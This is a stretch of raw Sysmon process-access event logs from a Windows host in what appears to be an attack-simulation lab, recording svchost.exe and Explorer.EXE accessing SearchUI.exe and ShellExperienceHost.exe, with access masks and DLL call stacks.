08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.524{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.524{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.524{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 